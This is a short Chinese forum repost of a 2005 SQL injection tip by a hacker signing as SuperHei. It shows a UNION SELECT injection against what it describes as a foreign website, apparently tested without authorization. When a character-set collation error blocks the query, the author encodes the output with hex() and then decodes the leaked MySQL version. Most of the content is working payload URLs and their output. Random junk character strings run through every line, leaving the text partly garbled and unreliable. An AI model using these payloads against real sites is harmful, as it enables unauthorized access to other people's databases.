本文作者:SuperHei! z9 S0 g3 y7 Q/ C2 C# Y( B/ l
文章性质:原创
- G( V+ I2 O& Q. d! z发布日期:2005-10-18
. V: d5 b/ l# s+ r- A7 M测试个国外的站时:7 g, @9 v( q5 Y4 q& q; F
url:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*) L. _* y8 B ?7 z3 [8 _+ Y
返回错误:
0 J# q I5 I8 [! e6 B7 J- r+ W. o, \' gIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
" P8 f ~. R; u- {9 A$ A* [MySQL Error No. 126
* u; h" u* \$ l看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
! A- I1 k# @# G+ L解决办法:转为其他编码如hex。
9 L: W4 l8 ?* e+ C5 uurl:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/* \# a. { T h' _
成功得到hex(version())的值为:
' H) `- ?+ W# g4 h3 j& j3 |! h342E312E332D62657461! u0 ?) V* Y& ^6 d' b0 X* @# I! H# h
回Mysql查询下得到:- t8 m% |5 m9 G% z. x8 A5 j! D- Z
mysql> select 0x342E312E332D62657461;6 _3 c6 G; Z* H- z7 x$ y
+------------------------+
! q( d+ c: Z2 e+ j| 0x342E312E332D62657461 |
2 o7 O8 |- k* c, z+------------------------+
0 O8 h2 R, ~3 J1 U) c| 4.1.3-beta |, q7 `3 F0 G) W1 ^9 L! X
+------------------------+! k1 A4 V5 M' Q( e/ m' [
1 row in set (0.00 sec)
. W y/ k9 y# ~( P8 z) s( _, j5 M' x6 s& k2 i7 l- ]' w3 Z/ b9 t: s
|
发表于 2012-9-15 14:04:54
收藏
支持
反对